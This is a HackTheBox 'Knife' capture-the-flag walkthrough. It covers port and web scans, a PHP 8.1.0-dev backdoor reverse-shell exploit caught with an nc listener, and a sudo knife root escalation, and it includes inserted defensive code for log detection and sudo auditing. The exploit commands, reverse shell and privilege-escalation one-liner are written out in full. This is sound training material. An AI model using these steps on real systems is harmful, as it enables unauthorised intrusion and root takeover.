HackTheBox Knife Walkthrough
Initial Enumeration
Port Scan
sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.10.242
sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.10.242
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:19 EDT
Nmap scan report for 10.10.10.242
Host is up (0.066s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:19 EDT
Warning: 10.10.10.242 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.242
Host is up (0.049s latency).
All 65535 scanned ports on 10.10.10.242 are open|filtered (65483) or closed (52)
Nmap done: 1 IP address (1 host up) scanned in 46.51 seconds
Vulnerability Scan
nmap -Pn -p 22,80 -sC -sV -oN details.txt 10.10.10.242
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:41 EDT
Nmap scan report for 10.10.10.242
Host is up (0.044s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds
Directory Scan
Website Front end:

gobuster dir -u http://10.10.10.242 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.242
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/05/12 20:58:18 Starting gobuster in directory enumeration mode
/server-status (Status: 403) [Size: 277]
===============================================================
2022/05/12 21:14:27 Finished
Nikto Scan
nikto -h http://10.10.10.242
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.242
+ Target Hostname: 10.10.10.242
+ Target Port: 80
+ Start Time: 2022-05-12 21:09:45 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 7863 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-05-12 21:16:35 (GMT-4) (410 seconds)
Hints for exploitation
Hint
From the Nikto scan we can see the website is powered by PHP 8.1.0-dev:
Retrieved x-powered-by header: PHP/8.1.0-dev
Searching for Possible Vulnerabilities
searchsploit php 8.1.0-dev
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Concrete5 CMS < 8.3.0 - Username / Comments Enumeration | php/webapps/44194.py
cPanel < 11.25 - Cross-Site Request Forgery (Add User PHP Script) | php/webapps/17330.html
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
FileRun < 2017.09.18 - SQL Injection | php/webapps/42922.py
Fozzcom Shopping < 7.94 / < 8.04 - Multiple Vulnerabilities | php/webapps/15571.txt
FreePBX < 13.0.188 - Remote Command Execution (Metasploit) | php/remote/40434.rb
IceWarp Mail Server < 11.1.1 - Directory Traversal | php/webapps/44587.txt
KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities | php/webapps/46956.txt
Kaltura < 13.2.0 - Remote Code Execution | php/webapps/43028.py
Kaltura Community Edition < 11.1.0-2 - Multiple Vulnerabilities | php/webapps/39563.txt
Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit) | php/webapps/45083.rb
NPDS < 08.06 - Multiple Input Validation Vulnerabilities | php/webapps/32689.txt
OPNsense < 19.1.1 - Cross-Site Scripting | php/webapps/46351.txt
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution | php/webapps/49933.py
After searching we can see that this script gives us an initial shell on the system.
Initial Shell Access
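The exploit listed above abuses a non-standard "User-Agentt" request header that the backdoored PHP/8.1.0-dev build honours. The following is an added example (not part of the original post) of how a defender would spot both the vulnerable version and attempts to trigger it; it assumes Apache's LogFormat has been extended with `%{User-Agentt}i` so the header is written to the access log, and the log lines are constructed.

```python
import re

# Added example, not from the original post. It assumes Apache's LogFormat has
# been extended to record the non-standard "User-Agentt" request header, e.g.
#   LogFormat "%h %t \"%r\" %>s \"%{User-Agent}i\" \"%{User-Agentt}i\"" watch
# Apache writes "-" for a header the client did not send, so any other value is a hit.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
    r'"(?P<ua>[^"]*)" "(?P<uat>[^"]*)"$'
)

# Constructed sample log: ordinary requests plus one carrying the backdoor header.
SAMPLE_LOG = """\
10.10.14.2 [12/May/2022:22:00:40 -0400] "GET / HTTP/1.1" 200 "Mozilla/5.0" "-"
10.10.14.2 [12/May/2022:22:00:41 -0400] "GET / HTTP/1.1" 200 "Mozilla/5.0" "CONSTRUCTED-TRIGGER"
10.10.14.9 [12/May/2022:22:00:42 -0400] "GET /index.php HTTP/1.1" 200 "curl/7.81.0" "-"
"""


def is_backdoored_php(headers: dict) -> bool:
    """True when the server advertises the backdoored PHP/8.1.0-dev build in X-Powered-By."""
    value = {k.lower(): v for k, v in headers.items()}.get("x-powered-by", "")
    return value.strip().lower() == "php/8.1.0-dev"


def find_user_agentt_requests(log_text: str) -> list:
    """Return parsed log entries that carried a User-Agentt header (value other than '-')."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed line or a different LogFormat; skip rather than guess
        if m["uat"] not in ("", "-"):
            hits.append(m.groupdict())
    return hits


if __name__ == "__main__":
    for hit in find_user_agentt_requests(SAMPLE_LOG):
        print(f"[!] {hit['ts']} {hit['ip']} sent User-Agentt on {hit['req']!r}")
```

No legitimate client sends a "User-Agentt" header, so its mere presence is a high-confidence indicator; the real fix is to replace the backdoored build rather than to filter the header.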
wget https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/revshell_php_8.1.0-dev.py
--2022-05-12 22:00:16-- https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/revshell_php_8.1.0-dev.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.109.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2318 (2.3K) [text/plain]
Saving to: ‘revshell_php_8.1.0-dev.py’
revshell_php_8.1.0-dev.py 100%[========================================================================================>] 2.26K --.-KB/s in 0s
2022-05-12 22:00:17 (45.6 MB/s) - ‘revshell_php_8.1.0-dev.py’ saved [2318/2318]
┌──(rocky㉿kali)-[~/hckbox/knife]
└─$ python3 revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.2 8989
Reverse shell
rlwrap nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.242] 36442
bash: cannot set terminal process group (974): Inappropriate ioctl for device
bash: no job control in this shell
whoami
whoami
james
id
id
uid=1000(james) gid=1000(james) groups=1000(james)
hostname
hostname
knife
james@knife:/$
Privilege Escalation
python3 -c 'import pty; pty.spawn("/bin/sh")'
sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
ls -al /usr/bin/knife
ls -al /usr/bin/knife
lrwxrwxrwx 1 root root 31 May 7 2021 /usr/bin/knife -> /opt/chef-workstation/bin/knife
It says the user 'james' can run the file 'knife' as root without knowing the root password.
Refer to the GTFOBins page about knife.
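A NOPASSWD rule for a binary that can spawn a shell is the whole privilege-escalation path here. As an added example (not from the original post), this audit script parses a "sudo -l" listing in the format shown above and flags rules that run such a binary as root; the sample listing is constructed from the output above plus an extra rule, and the set of shell-capable binaries is an illustrative subset of what GTFOBins documents.

```python
import re

# Added example, not from the original post: audit a "sudo -l" listing for rules
# that hand a user a root shell. Rule lines have the form "(runas) TAG: cmd, cmd".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")

# Illustrative subset of binaries with a documented GTFOBins sudo shell escape
# (knife is the one on this box; the others are well-known examples).
SHELL_ESCAPE_BINS = {"knife", "vim", "vi", "find", "python3", "perl", "less", "awk", "bash", "sh"}

# Constructed sample modelled on the listing shown above, with one extra rule added.
SAMPLE_SUDO_L = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root : root) /usr/bin/systemctl restart apache2, /usr/bin/less /var/log/syslog
"""


def parse_sudo_l(text: str) -> list:
    """Parse the 'may run the following commands' block into (runas, tags, command) tuples."""
    rules, in_block = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_block = True
            continue
        if not in_block:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue  # blank line or something that is not a rule
        tags = {t.rstrip(":") for t in m["tags"].split()}
        runas = m["runas"].split(":")[0].strip()  # "(root : root)" -> "root"
        for cmd in m["cmds"].split(","):
            rules.append((runas, tags, cmd.strip()))
    return rules


def risky_rules(text: str) -> list:
    """Rules that run a shell-capable binary as root; NOPASSWD makes them worse."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if runas in ("root", "ALL") and binary in SHELL_ESCAPE_BINS:
            findings.append({"command": cmd, "nopasswd": "NOPASSWD" in tags})
    return findings
```

Note that restricting arguments in sudoers does not help for binaries like knife that evaluate code by design; the fix is to grant a narrower wrapper or drop the rule.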
cd /home/james
cd /home/james
ls
ls
user.txt
sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
whoami
whoami
james
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
whoami
whoami
root
cd /root
cd /root
ls
ls
delete.sh root.txt snap
ls -al
ls -al
total 56
drwx------ 7 root root 4096 May 18 2021 .
drwxr-xr-x 20 root root 4096 May 18 2021 ..
lrwxrwxrwx 1 root root 9 May 8 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3137 May 7 2021 .bashrc
drwx------ 2 root root 4096 May 7 2021 .cache
drwx------ 3 root root 4096 May 18 2021 .chef
-rwxr-xr-x 1 root root 105 May 8 2021 delete.sh
drwxr-xr-x 3 root root 4096 May 7 2021 .local
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw------- 1 root root 1024 May 8 2021 .rnd
-r-------- 1 root root 33 May 14 00:03 root.txt
-rw-r--r-- 1 root root 66 May 8 2021 .selected_editor
drwxr-xr-x 3 root root 4096 May 6 2021 snap
drwx------ 2 root root 4096 May 6 2021 .ssh
-rw------- 1 root root 2413 May 18 2021 .viminfo
#
We have the root access and root flag.
Learning
The box was simple if you get two points:
From the Nikto scan, notice the PHP dev version and look for an exploit for that version.
The sudo -l output gives the "/usr/bin/knife" file. I did not initially know it is a standard service in Linux; I thought it was a custom service. After a few searches I found it is a standard service, which led me to the GTFOBins site for privilege escalation.